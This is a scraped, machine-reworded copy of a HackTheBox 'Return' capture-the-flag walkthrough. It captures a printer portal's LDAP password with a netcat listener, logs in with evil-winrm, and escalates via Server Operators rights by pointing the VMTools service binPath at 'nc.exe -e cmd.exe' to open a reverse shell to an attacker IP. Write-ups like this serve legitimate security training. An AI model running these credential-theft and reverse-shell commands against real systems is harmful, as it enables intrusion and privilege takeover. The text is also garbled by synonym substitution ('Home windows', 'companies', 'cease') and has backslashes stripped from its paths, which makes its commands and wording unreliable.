Tuesday, October 18, 2022
HomeHackerReturn HackTheBox Walkthrough - Hacking Articles

Return HackTheBox Walkthrough – Hacking Articles


Return is a Home windows machine on HTB and is rated as straightforward, this field is designed over home windows which have Weak Service Permission. If summarized, we’ll abuse a printer admin portal to get hardcoded credentials by way of netcat and use them for WinRM login. The printer service account is a member of the Server Operators group which permits one to cease and begin some companies. Thus, we exploited weak configured companies to execute our malicious exe file by abusing the Server Operators’ permission.

Desk of content material

Preliminary Entry

  • Enumeration
  • Credential Dumping
  • WinRM Legitimate Account
  • Person Flag

Privilege Escalation

  • Abusing weak service permission
  • Root lag

Let’s deep dive into this.

Preliminary Entry

First, we do a Nmap scan of the machine’s IP tackle to search out the open ports and noticed some ports are open, from Microsoft Companies we understood its Home windows Working System.

nmap -sV -sC 10.129.31.219

Enumeration

Since port 80 is open, let’s attempt to entry the IP tackle by way of a browser.

As you may see, we now have entry to a printer admin panel. The pages are working PHP. Let’s navigate to the setting tab.

The above setting reveals us the username which is svc-printer and the hardcoded password which has been masked. The server tackle discipline is the one discipline that works as a parameter then the replace button is pressed. So the printer is speaking with the native tackle on port 389.

What if we change the server tackle with the attacking machine IP tackle utilizing port 389?

Credential Dumping

As soon as we now have changed the server tackle from the attacker’s IP (Kali Linux), we launched Netcat listener on port 389 on our kali machine.

nc -lvp 389

As soon as we hit the replace button, we obtained the password “1edFg43012!!”

WinRM Legitimate Account

Let’s use evil-winrm to ascertain a distant connection. This may be finished by issuing the command beneath:

evil-winrm -i 10.129.31.219 -u svc-printer -p "1edFg43012!!"

We’ve got entry to the server. Let’s browser to the desktop listing and see if we will discover any flags. Certainly, as proven within the above screenshot, we will discover the person.txt flag.

Privilege Escalation

Now that we now have entry to the machine, let’s confirm which person permission or group we now have.

To confirm this, we subject the command internet person svc-printer

From the screenshot beneath, we will see that the precise person is a member of the server operators group.

What can a person with a Server Operators group membership do?

The server operators can begin and cease companies.

The server Operator group is taken into account a service administrator and might change binaries which can be put in on the area controller, learn extra from right here.

add /usr/share/windows-binaries/nc.exe

Thus, we first uploaded the nc.exe home windows binaries file after which enumerate for put in companies for additional exploitation.

companies

we discovered a listing of put in companies and their path together with true/false flags for privileges.

Abusing Weak Service Permission

Right here we have to analyse which binary path we will modify to execute nc.exe file

First, we strive home windows defender to alter the binary path for WinDefend however acquired an entry denied error.

sc.exe config WinDefend binPath="C:Userssvc-printerDesktopnc.exe -e cmd.exe 10.10.14.93 1234"

Then we attempt to modify the binary path for VMTools and eventually this labored for us.

sc.exe config VMTools binPath="C:Userssvc-printerDesktopnc.exe -e cmd.exe 10.10.14.93 1234"

Since SVC-printer is a member of the server operator thus we will restart the service to get the reverse connection. So, let’s cease and begin the service VMTools by issuing the command:

sc.exe cease VMTools
sc.exe begin VMTools

Earlier than beginning the service VMTools, we be sure that the netcat is listening on port 1234 as proven beneath.

As soon as the service is stopped and will get began, we acquired netcat session as receive Root flag. 

Writer: Tirut Hawoldar is a Cyber Safety Fanatic and CTF participant with 15 years of expertise in IT Safety and Infrastructure. May be Contacted on LinkedIn

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments